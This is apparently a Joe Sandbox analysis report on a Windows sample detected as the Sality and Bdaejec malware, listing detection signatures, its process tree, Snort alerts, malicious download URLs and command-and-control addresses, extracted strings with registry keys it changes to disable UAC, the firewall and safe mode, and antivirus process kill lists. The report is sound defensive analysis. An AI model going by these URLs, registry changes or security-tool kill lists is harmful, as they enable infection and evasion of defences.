Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.0.0.2.exe

Overview

General Information

Sample name:1.0.0.2.exe
Analysis ID:1467981
MD5:ad809738e208d99a28009023546bc695
SHA1:3326e4971b5b23122dac680dfb9eb41df0692267
SHA256:775939b8bf22ee4999cebd8d9e1525ca9417464b5fe6ed1778f0a7b43d07d6ef
Tags:exesality
Infos:

Detection

Bdaejec, Sality
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Bdaejec
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 1.0.0.2.exe (PID: 5352 cmdline: "C:\Users\user\Desktop\1.0.0.2.exe" MD5: AD809738E208D99A28009023546BC695)
    • rksowY.exe (PID: 5344 cmdline: C:\Users\user\AppData\Local\Temp\rksowY.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 7356 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • fontdrvhost.exe (PID: 780 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • fontdrvhost.exe (PID: 788 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 996 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SalityF-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.InfectionSality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.PayloadOnce installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
  • Salty Spider
https://malpedia.caad.fkie.fraunhofer.de/details/win.sality

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\winmefmb.exeINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!
C:\iuepn.exeINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
  • 0x14:$b1: yrf<[LordPE]
  • 0x210:$b2: Hello world!

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_SalityYara detected SalityJoe Security
    Process Memory Space: 1.0.0.2.exe PID: 5352JoeSecurity_SalityYara detected SalityJoe Security
      Process Memory Space: rksowY.exe PID: 5344JoeSecurity_BdaejecYara detected BdaejecJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.1.0.0.2.exe.111ff18.7.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x14:$b1: yrf<[LordPE]
        • 0x210:$b2: Hello world!
        0.2.1.0.0.2.exe.2be2300.11.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x1b7c:$s1: Simple Poly user v
        • 0x14:$b1: yrf<[LordPE]
        • 0x210:$b2: Hello world!
        0.2.1.0.0.2.exe.2be25f4.12.raw.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
        • 0x1888:$s1: Simple Poly user v
        0.2.1.0.0.2.exe.2b60000.10.unpackJoeSecurity_SalityYara detected SalityJoe Security
          0.2.1.0.0.2.exe.2b60000.10.unpackINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
          • 0x83e7c:$s1: Simple Poly user v
          • 0x82314:$b1: yrf<[LordPE]
          • 0x82510:$b2: Hello world!
          Click to see the 2 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Modification of IE Registry Settings
          Source: Registry Key setAuthor: frack113: Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1.0.0.2.exe, ProcessId: 5352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline

          Snort Signatures

          Timestamp:07/05/24-08:00:04.879865
          SID:2804830
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:03.856779
          SID:2804830
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:06.311326
          SID:2804830
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:09.880391
          SID:2804830
          Source Port:49722
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:06.909560
          SID:2804830
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:07.763277
          SID:2804830
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:03.315545
          SID:2838522
          Source Port:63363
          Destination Port:53
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:06.805804
          SID:2037771
          Source Port:80
          Destination Port:49716
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:09.129606
          SID:2804830
          Source Port:49720
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:03.544015
          SID:2807908
          Source Port:49710
          Destination Port:799
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:10.394245
          SID:2804830
          Source Port:49723
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:10.955809
          SID:2804830
          Source Port:49725
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/05/24-08:00:11.733848
          SID:2804830
          Source Port:49726
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: 1.0.0.2.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://amsamex.com/xs.jpgAvira URL Cloud: Label: malware
          Source: http://www.careerdesk.org/images/xs.jpg?5059c3=10531718Avira URL Cloud: Label: malware
          Source: http://www.careerdesk.org/images/xs.jpgAvira URL Cloud: Label: malware
          Source: http://a3inforservice.com.br/images/logof.gifAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarsAvira URL Cloud: Label: phishing
          Source: http://www.klkjwre9fqwieluoi.info/Avira URL Cloud: Label: malware
          Source: http://arthur.niria.biz/xs.jpgAvira URL Cloud: Label: malware
          Source: http://arthur.niria.biz/xs.jpg?51fbda=483560101Avira URL Cloud: Label: malware
          Source: http://amsamex.com/xs.jpg?ce2fff=94588921Avira URL Cloud: Label: malware
          Source: http://accnet.ca/xs.jpgAvira URL Cloud: Label: malware
          Source: http://ahmediye.net/xs.jpgAvira URL Cloud: Label: malware
          Source: http://kukutrustnet777888.info/DisableTaskMgrSoftwareAvira URL Cloud: Label: phishing
          Source: http://althawry.org/images/xs.jpgAvira URL Cloud: Label: malware
          Source: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gifAvira URL Cloud: Label: malware
          Source: http://apple-pie.in/images/xs.jpgAvira URL Cloud: Label: phishing
          Source: http://arthur.niria.biz/xs.jpg?51fbda=48356010aAvira URL Cloud: Label: malware
          Source: http://amsamex.com/xs.jpg?ce2fff=945889216Avira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarAvira URL Cloud: Label: malware
          Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310TAvira URL Cloud: Label: malware
          Source: http://kukutrustnet987.info/home.gifAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rar9Avira URL Cloud: Label: malware
          Source: http://ampyazilim.com.tr/images/xs2.jpgAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rar6Avira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rar4Avira URL Cloud: Label: malware
          Source: http://173.193.19.14/logo.gifAvira URL Cloud: Label: malware
          Source: http://kukutrustnet888.info/home.gifAvira URL Cloud: Label: malware
          Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310CAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarLAvira URL Cloud: Label: malware
          Source: http://kukutrustnet777.info/home.gifAvira URL Cloud: Label: malware
          Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310Avira URL Cloud: Label: malware
          Source: http://apple-pie.in/images/xs.jpg?ce2fff=121614327Avira URL Cloud: Label: phishing
          Source: http://apple-pie.in/images/xs.jpg?554c8c=39131092Avira URL Cloud: Label: phishing
          Source: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gifAvira URL Cloud: Label: malware
          Source: http://amsamex.com/xs.jpg?549590=27716560Avira URL Cloud: Label: malware
          Source: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdriversAvira URL Cloud: Label: malware
          Source: http://arthur.niria.biz/xs.jpg?51fbda=48356010Avira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net/Avira URL Cloud: Label: malware
          Source: http://g2.arrowhitech.com/xs.jpgAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarpAvira URL Cloud: Label: malware
          Source: http://kukutrustnet777888.info/Avira URL Cloud: Label: phishing
          Source: http://89.119.67.154/testo5/Avira URL Cloud: Label: malware
          Source: http://www.careerdesk.org/images/xs.jpg?ad5654=34079484Avira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\iuepn.exeAvira: detection malicious, Label: W32/Sality.AT
          Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
          Source: C:\Users\user\AppData\Local\Temp\winmefmb.exeAvira: detection malicious, Label: W32/Sality.AT
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
          Multi AV Scanner detection for domain / URL
          Source: www.careerdesk.orgVirustotal: Detection: 11%Perma Link
          Source: ddos.dnsnb8.netVirustotal: Detection: 11%Perma Link
          Source: apple-pie.inVirustotal: Detection: 13%Perma Link
          Source: arthur.niria.bizVirustotal: Detection: 10%Perma Link
          Source: ahmediye.netVirustotal: Detection: 9%Perma Link
          Source: amsamex.comVirustotal: Detection: 8%Perma Link
          Source: althawry.orgVirustotal: Detection: 11%Perma Link
          Source: http://www.careerdesk.org/images/xs.jpgVirustotal: Detection: 9%Perma Link
          Source: http://amsamex.com/xs.jpgVirustotal: Detection: 9%Perma Link
          Source: http://www.klkjwre9fqwieluoi.info/Virustotal: Detection: 10%Perma Link
          Source: http://arthur.niria.biz/xs.jpgVirustotal: Detection: 10%Perma Link
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarsVirustotal: Detection: 11%Perma Link
          Source: http://ahmediye.net/xs.jpgVirustotal: Detection: 10%Perma Link
          Source: http://kukutrustnet777888.info/DisableTaskMgrSoftwareVirustotal: Detection: 14%Perma Link
          Source: http://accnet.ca/xs.jpgVirustotal: Detection: 8%Perma Link
          Source: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.jVirustotal: Detection: 6%Perma Link
          Source: http://althawry.org/images/xs.jpgVirustotal: Detection: 9%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeReversingLabs: Detection: 100%
          Source: C:\Users\user\Desktop\VF.dllReversingLabs: Detection: 26%
          Multi AV Scanner detection for submitted file
          Source: 1.0.0.2.exeVirustotal: Detection: 86%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
          Machine Learning detection for dropped file
          Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
          Source: C:\iuepn.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\winmefmb.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: 1.0.0.2.exeJoe Sandbox ML: detected
          Source: 1.0.0.2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

          Spreading

          barindex
          Yara detected Sality
          Source: Yara matchFile source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 1.0.0.2.exe PID: 5352, type: MEMORYSTR
          Creates autorun.inf (USB autostart)
          Source: C:\Users\user\Desktop\1.0.0.2.exeFile created: C:\autorun.infJump to behavior
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
          Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\autorun.inf_
          Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\autorun.inf_
          Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.infH
          Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
          Source: 1.0.0.2.exe, 00000000.00000002.2266190166.000000000117B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.infH
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: [AutoRun]
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: autorun.inf
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns0MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_90833SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
          Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly user v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMBhttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV useravast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVuser.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRAY.CL
          Source: 1.0.0.2.exe, 00000000.00000003.2255401629.000000000117A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.infH
          Source: 1.0.0.2.exe, 00000000.00000002.2272180867.000000000522B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [autorun]
          Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
          Source: autorun.inf.0.drBinary or memory string: [AutoRun]
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B6BADD Sleep,FindFirstFileA,FindNextFileA,Sleep,0_2_02B6BADD
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02B657A0 FindFirstFileA,FindNextFileA,Sleep,0_2_02B657A0
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_005B29E2
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeCode function: 2_2_005B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_005B2B8C
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.6:63363 -> 1.1.1.1:53
          Source: TrafficSnort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.6:49710 -> 44.221.84.105:799
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49712 -> 54.244.188.177:80
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49715 -> 44.221.84.105:80
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49716 -> 44.221.84.105:80
          Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 44.221.84.105:80 -> 192.168.2.6:49716
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49718 -> 78.46.2.155:80
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49719 -> 37.230.104.89:80
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49720 -> 54.244.188.177:80
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49722 -> 44.221.84.105:80
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49723 -> 44.221.84.105:80
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49725 -> 78.46.2.155:80
          Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49726 -> 37.230.104.89:80
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 799
          Source: global trafficTCP traffic: 192.168.2.6:49710 -> 44.221.84.105:799
          Source: global trafficUDP traffic: 192.168.2.6:52747 -> 85.17.167.196:9832
          Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
          Source: Joe Sandbox ViewIP Address: 54.244.188.177 54.244.188.177
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: AEROTEK-ASTR AEROTEK-ASTR
          Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5059c3=10531718 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /xs.jpg?51fbda=48356010 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cache
